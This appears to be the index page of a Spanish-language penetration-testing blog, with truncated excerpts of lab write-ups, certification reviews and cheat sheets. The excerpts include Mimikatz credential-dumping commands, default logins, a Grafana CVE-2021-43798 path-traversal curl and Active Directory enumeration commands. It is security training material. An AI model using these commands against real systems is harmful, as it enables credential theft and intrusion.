SQL Injection Apprentice
Resolución de los laboratorios “apprentice” SQLi de PortSwigger SQL injection vulnerability in WHERE clause allowing retrieval of hidden dataInstrucciones: This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following:SELECT * FROM products WHERE category = 'Gifts' AND released = 1To solve the lab, perform a SQL injection attack that causes the application to display one or m...
CWES Review
Certified Web Exploitation Specialist, también conocida como CWES (anteriormente CBBH), es una certificación completamente centrada en Web Penetration Testing, algo que sabía que necesitaba mejorar y decidí tomar el path que ofrece HackTheBox. Pensé en algún momento en cursar la eWPTX, pero tras ver los cambios que le hizo INE a esta certificación sentí que ya no valía la pena. También me vi influenciado principalmente por jackie0x17, ya que hablaba bastante bien sobre ella y pues dije: bueno...
Bloodhound Ingestor
Existen multiples ingestores para Bloodhound siendo el mas popular bloodhound-python, todo este articulo muestra tanto para BloodHound-Legacy tanto para Bloodhound-CE (Recomendación dejar de utilizar BloodHound-Legacy y centrarse en BloodHound-CE) RustHoundBloodhound-python pero en Rust, proyecto en constante actualización y disponible en el siguiente Repositorio.Uso básico: 123./rusthound -d hokkaido-aerospace.com -u Hazel.Green -p 'pass' -z# Para BloodHound-CErusthound-ce -d lab.t...
Mimikatz
Iniciar12345678# Iniciar Mimikatzmimikatz.exe# Verificar/obtener privilegios (siempre ejecutar primero)privilege::debug# Elevar a SYSTEM (si es necesario)token::elevate Extracción de Credenciales12345678910111213141516171819202122# Extraer credenciales en texto plano de la memoriasekurlsa::logonpasswords# Extraer secretos LSA (servicios, auto-logon)lsadump::secrets# Extraer hashes SAM locallsadump::samlsadump::lsa /patch #both these dump SAM# Extraer cachés de credenciales de dominiolsadump::...
Pentesting Wordpress
Credenciales Por Defecto1admin:password Enumeración Manual12345678910111213141516171819202122# Version de Wordpresscurl -s -X GET http://blog.inlanefreight.com | grep '<meta name="generator"'# Plugins (Recomendado hacerlo en articulos de WordPress)curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2# Themescurl -s -X GET http://blog.inlanefreight.c...
Pentesting Grafana
Credenciales Por Defecto12admin:adminadmin:prom-operator Archivos interesantes12/etc/grafana/grafana.ini # admin_user y admin_password (secretKey)/var/lib/grafana/grafana.db # Mirar la tabla data_source CVE 2021-43798Existe un exploit para Grafana 8.3.0 este permite realizar un directory traversal a partir del directorio de los plugins; para acceder a los anteriores archivos, aunque también se puede realizar con curl: 1curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../....
CRTA 2025 Review
Certified Red Team Analyst, también conocido como CRTA, es una de las certificaciones que han tenido mucha popularidad recientemente, así que después de haber obtenido el OSCP decidí darle una oportunidad a CyberWarfare Labs con el CRTA. He de decir antes que nada que me tocó tomar la versión del examen de 6 horas. A fecha de redacción de este artículo, el examen no ha cambiado y esta review se centra en este material específico. CursoRespecto al material que te ofrecen del curso, te dan un...
Yadis
Yadis es una máquina fácil de la plataforma de VulNyx. El principio de la máquina se basa en “La enumeración es la clave”. Temas a tratar: Enumeración, Local Port Forwarding, Go, Redis. OS: Linux. IP victima: 192.168.166.133 EnumeraciónNmap1234567891011121314151617181920212223242526272829303132sudo nmap -p- 192.168.166.133 -sSVC -T5 -Pn Starting Nmap 7.97 ( https://nmap.org ) at 2025-08-07 22:15 -0600Nmap scan report for yadis.nyx (192.168.166.133)Host is up (0.00074s latency).Not shown:...
Cicada
Descripción Nivel: Fácil. Temas a tratar: Enumeración, Windows, Active Directory, Kerberoasting. OS: Windows. Plataforma: HackTheBox Fecha de retiro: IP victima: 10.10.11.35 IP atacante: 10.10.14.4 EnumeraciónEmpezamos enumerando todos los puertos bajo el protocolo TCP. 123456789101112131415Nmap scan report for cicada.htb (10.10.11.35)Host is up, received echo-reply ttl 127 (0.14s latency).Scanned at 2025-01-17 12:32:38 CST for 104sPORT STATE SERVICE REASON VERSION53/tcp...
Forest
Descripción Nivel: Fácil (Intermedia por el pivesc). Temas a tratar: Enumeración, Windows, Active Directory, AS-REP Roasting, DCSync. OS: Windows. Plataforma: HackTheBox Fecha de retiro: 21/03/2020 IP victima: 10.10.10.161 IP atacante: 10.10.14.10 EnumeraciónEmpezamos enumerando todos los puertos bajo el protocolo TCP. 1234567891011121314151617181920212223242526Not shown: 65511 closed tcp ports (reset)PORT STATE SERVICE REASON53/tcp open domain syn-ack ...









